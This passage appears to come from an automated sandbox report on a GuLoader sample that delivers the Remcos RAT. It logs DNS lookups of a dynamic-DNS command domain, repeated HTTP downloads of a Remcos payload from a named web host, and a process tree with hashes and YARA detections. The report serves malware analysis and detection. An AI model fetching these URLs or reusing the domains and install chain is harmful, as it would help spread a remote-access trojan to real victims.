                Jun 7, 2021 20:45:31.601393938 CEST | 192.168.2.6 | 8.8.8.8 | 0x6cc | Standard query (0) | hjduiebcvzcalpmjdbcnwqadhsiybcnzxswedgap.ydns.eu | A (IP address) | IN (0x0001)
                Jun 7, 2021 20:45:53.789323092 CEST | 192.168.2.6 | 8.8.8.8 | 0x9d50 | Standard query (0) | hjduiebcvzcalpmjdbcnwqadhsiybcnzxswedgap.ydns.eu | A (IP address) | IN (0x0001)
                Jun 7, 2021 20:46:15.892798901 CEST | 192.168.2.6 | 8.8.8.8 | 0x49f3 | Standard query (0) | hjduiebcvzcalpmjdbcnwqadhsiybcnzxswedgap.ydns.eu | A (IP address) | IN (0x0001)
                Jun 7, 2021 20:46:38.136794090 CEST | 192.168.2.6 | 8.8.8.8 | 0x8b5c | Standard query (0) | hjduiebcvzcalpmjdbcnwqadhsiybcnzxswedgap.ydns.eu | A (IP address) | IN (0x0001)

                DNS Answers

                Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                Jun 7, 2021 20:43:35.141453981 CEST | 8.8.8.8 | 192.168.2.6 | 0x5409 | No error (0) | ztechinternational.com | | 192.185.113.219 | A (IP address) | IN (0x0001)
                Jun 7, 2021 20:45:07.758765936 CEST | 8.8.8.8 | 192.168.2.6 | 0x9bee | No error (0) | ztechinternational.com | | 192.185.113.219 | A (IP address) | IN (0x0001)
                Jun 7, 2021 20:45:07.863574028 CEST | 8.8.8.8 | 192.168.2.6 | 0xb3e7 | No error (0) | ztechinternational.com | | 192.185.113.219 | A (IP address) | IN (0x0001)
                Jun 7, 2021 20:45:09.424510956 CEST | 8.8.8.8 | 192.168.2.6 | 0xda30 | No error (0) | hjduiebcvzcalpmjdbcnwqadhsiybcnzxswedgap.ydns.eu | | 172.94.125.152 | A (IP address) | IN (0x0001)
                Jun 7, 2021 20:45:19.376274109 CEST | 8.8.8.8 | 192.168.2.6 | 0xb1ba | No error (0) | ztechinternational.com | | 192.185.113.219 | A (IP address) | IN (0x0001)
                Jun 7, 2021 20:45:31.667457104 CEST | 8.8.8.8 | 192.168.2.6 | 0x6cc | No error (0) | hjduiebcvzcalpmjdbcnwqadhsiybcnzxswedgap.ydns.eu | | 172.94.125.152 | A (IP address) | IN (0x0001)
                Jun 7, 2021 20:45:53.833571911 CEST | 8.8.8.8 | 192.168.2.6 | 0x9d50 | No error (0) | hjduiebcvzcalpmjdbcnwqadhsiybcnzxswedgap.ydns.eu | | 172.94.125.152 | A (IP address) | IN (0x0001)
                Jun 7, 2021 20:46:16.001064062 CEST | 8.8.8.8 | 192.168.2.6 | 0x49f3 | No error (0) | hjduiebcvzcalpmjdbcnwqadhsiybcnzxswedgap.ydns.eu | | 172.94.125.152 | A (IP address) | IN (0x0001)
                Jun 7, 2021 20:46:38.179811001 CEST | 8.8.8.8 | 192.168.2.6 | 0x8b5c | No error (0) | hjduiebcvzcalpmjdbcnwqadhsiybcnzxswedgap.ydns.eu | | 172.94.125.152 | A (IP address) | IN (0x0001)

                HTTP Request Dependency Graph

                • ztechinternational.com

                HTTP Packets

                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                0 | 192.168.2.6 | 49732 | 192.185.113.219 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe

                Timestamp | kBytes transferred | Direction | Data
                Jun 7, 2021 20:43:35.357248068 CEST | 1403 | OUT | GET /dk/Jice_remcos%202_vOOXAzQx82.bin HTTP/1.1
                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                Host: ztechinternational.com
                Cache-Control: no-cache
                Jun 7, 2021 20:43:35.553634882 CEST | 1412 | IN | HTTP/1.1 200 OK
                Date: Mon, 07 Jun 2021 18:43:35 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade
                Last-Modified: Sun, 06 Jun 2021 21:56:00 GMT
                Accept-Ranges: bytes
                Content-Length: 131136
                Content-Type: application/octet-stream


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                1 | 192.168.2.6 | 49753 | 192.185.113.219 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe

                Timestamp | kBytes transferred | Direction | Data
                Jun 7, 2021 20:45:07.958627939 CEST | 3713 | OUT | GET /dk/Jice_remcos%202_vOOXAzQx82.bin HTTP/1.1
                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                Host: ztechinternational.com
                Cache-Control: no-cache
                Jun 7, 2021 20:45:08.127895117 CEST | 3715 | IN | HTTP/1.1 200 OK
                Date: Mon, 07 Jun 2021 18:45:08 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade
                Last-Modified: Sun, 06 Jun 2021 21:56:00 GMT
                Accept-Ranges: bytes
                Content-Length: 131136
                Content-Type: application/octet-stream


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                2 | 192.168.2.6 | 49754 | 192.185.113.219 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe

                Timestamp | kBytes transferred | Direction | Data
                Jun 7, 2021 20:45:08.057746887 CEST | 3713 | OUT | GET /dk/Jice_remcos%202_vOOXAzQx82.bin HTTP/1.1
                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                Host: ztechinternational.com
                Cache-Control: no-cache
                Jun 7, 2021 20:45:08.229717016 CEST | 3728 | IN | HTTP/1.1 200 OK
                Date: Mon, 07 Jun 2021 18:45:08 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade
                Last-Modified: Sun, 06 Jun 2021 21:56:00 GMT
                Accept-Ranges: bytes
                Content-Length: 131136
                Content-Type: application/octet-stream


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                3 | 192.168.2.6 | 49756 | 192.185.113.219 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe

                Timestamp | kBytes transferred | Direction | Data
                Jun 7, 2021 20:45:19.587258101 CEST | 3988 | OUT | GET /dk/Jice_remcos%202_vOOXAzQx82.bin HTTP/1.1
                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                Host: ztechinternational.com
                Cache-Control: no-cache
                Jun 7, 2021 20:45:19.764909983 CEST | 3990 | IN | HTTP/1.1 200 OK
                Date: Mon, 07 Jun 2021 18:45:19 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade
                Last-Modified: Sun, 06 Jun 2021 21:56:00 GMT
                Accept-Ranges: bytes
                Content-Length: 131136
                Content-Type: application/octet-stream


                Code Manipulations

                Statistics

                Behavior


                System Behavior

                General

                Start time: 20:42:34
                Start date: 07/06/2021
                Path: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe
                Wow64 process (32bit): true
                Commandline: 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe'
                Imagebase: 0x400000
                File size: 110592 bytes
                MD5 hash: 853744502B68E50E6CBAF81FFB3F5CC0
                Has elevated privileges: true
                Has administrator privileges: true
                Programmed in: Visual Basic
                Yara matches:
                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Author: Joe Security
                Reputation: low

                General

                Start time: 20:43:01
                Start date: 07/06/2021
                Path: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe
                Wow64 process (32bit): true
                Commandline: 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe'
                Imagebase: 0x400000
                File size: 110592 bytes
                MD5 hash: 853744502B68E50E6CBAF81FFB3F5CC0
                Has elevated privileges: true
                Has administrator privileges: true
                Programmed in: C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000000.383895844.0000000000560000.00000040.00000001.sdmp, Author: Joe Security
                Reputation: low

                General

                Start time: 20:43:38
                Start date: 07/06/2021
                Path: C:\Windows\SysWOW64\wscript.exe
                Wow64 process (32bit): true
                Commandline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs'
                Imagebase: 0xff0000
                File size: 147456 bytes
                MD5 hash: 7075DD7B9BE8807FCA93ACD86F724884
                Has elevated privileges: true
                Has administrator privileges: true
                Programmed in: C, C++ or other language
                Reputation: high

                General

                Start time: 20:43:41
                Start date: 07/06/2021
                Path: C:\Windows\SysWOW64\cmd.exe
                Wow64 process (32bit): true
                Commandline: 'C:\Windows\System32\cmd.exe' /c 'C:\Users\user\AppData\Roaming\win.exe'
                Imagebase: 0x2a0000
                File size: 232960 bytes
                MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
                Has elevated privileges: true
                Has administrator privileges: true
                Programmed in: C, C++ or other language
                Reputation: high

                General

                Start time: 20:43:41
                Start date: 07/06/2021
                Path: C:\Windows\System32\conhost.exe
                Wow64 process (32bit): false
                Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase: 0x7ff61de10000
                File size: 625664 bytes
                MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
                Has elevated privileges: true
                Has administrator privileges: true
                Programmed in: C, C++ or other language
                Reputation: high

                General

                Start time:20:43:42
                Start date:07/06/2021
                Path:C:\Users\user\AppData\Roaming\win.exe
                Wow64 process (32bit):true
                Commandline:C:\Users\user\AppData\Roaming\win.exe
                Imagebase:0x400000
                File size:110592 bytes
                MD5 hash:853744502B68E50E6CBAF81FFB3F5CC0
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:Visual Basic
                Yara matches:
                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000010.00000002.613714696.00000000020B0000.00000040.00000001.sdmp, Author: Joe Security
                Antivirus matches:
                • Detection: 6%, ReversingLabs
                Reputation:low

                General

                Start time:20:43:44
                Start date:07/06/2021
                Path:C:\Users\user\AppData\Roaming\win.exe
                Wow64 process (32bit):true
                Commandline:'C:\Users\user\AppData\Roaming\win.exe'
                Imagebase:0x400000
                File size:110592 bytes
                MD5 hash:853744502B68E50E6CBAF81FFB3F5CC0
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:Visual Basic
                Yara matches:
                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000011.00000002.603499845.00000000007A0000.00000040.00000001.sdmp, Author: Joe Security
                Reputation:low

                General

                Start time:20:43:52
                Start date:07/06/2021
                Path:C:\Users\user\AppData\Roaming\win.exe
                Wow64 process (32bit):true
                Commandline:'C:\Users\user\AppData\Roaming\win.exe'
                Imagebase:0x400000
                File size:110592 bytes
                MD5 hash:853744502B68E50E6CBAF81FFB3F5CC0
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:Visual Basic
                Yara matches:
                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000012.00000002.644122683.00000000020B0000.00000040.00000001.sdmp, Author: Joe Security
                Reputation:low

                General

                Start time:20:44:25
                Start date:07/06/2021
                Path:C:\Users\user\AppData\Roaming\win.exe
                Wow64 process (32bit):true
                Commandline:'C:\Users\user\AppData\Roaming\win.exe'
                Imagebase:0x400000
                File size:110592 bytes
                MD5 hash:853744502B68E50E6CBAF81FFB3F5CC0
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000016.00000002.660151221.0000000000560000.00000040.00000001.sdmp, Author: Joe Security
                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000016.00000000.566291257.0000000000560000.00000040.00000001.sdmp, Author: Joe Security
                Reputation:low

                General

                Start time:20:44:25
                Start date:07/06/2021
                Path:C:\Users\user\AppData\Roaming\win.exe
                Wow64 process (32bit):true
                Commandline:C:\Users\user\AppData\Roaming\win.exe
                Imagebase:0x400000
                File size:110592 bytes
                MD5 hash:853744502B68E50E6CBAF81FFB3F5CC0
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000017.00000002.846829596.00000000023B0000.00000004.00000040.sdmp, Author: Joe Security
                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000017.00000000.566645906.0000000000560000.00000040.00000001.sdmp, Author: Joe Security
                Reputation:low

                General

                Start time:20:44:38
                Start date:07/06/2021
                Path:C:\Users\user\AppData\Roaming\win.exe
                Wow64 process (32bit):true
                Commandline:'C:\Users\user\AppData\Roaming\win.exe'
                Imagebase:0x400000
                File size:110592 bytes
                MD5 hash:853744502B68E50E6CBAF81FFB3F5CC0
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000018.00000000.596745893.0000000000560000.00000040.00000001.sdmp, Author: Joe Security
                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000018.00000002.679457919.0000000000560000.00000040.00000001.sdmp, Author: Joe Security
                Reputation:low

                General

                Start time:20:45:54
                Start date:07/06/2021
                Path:C:\Windows\System32\backgroundTaskHost.exe
                Wow64 process (32bit):false
                Commandline:'C:\Windows\system32\backgroundTaskHost.exe' -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
                Imagebase:0x7ff614b90000
                File size:19352 bytes
                MD5 hash:B7FC4A29431D4F795BBAB1FB182B759A
                Has elevated privileges:true
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:moderate

                Disassembly

                Code Analysis
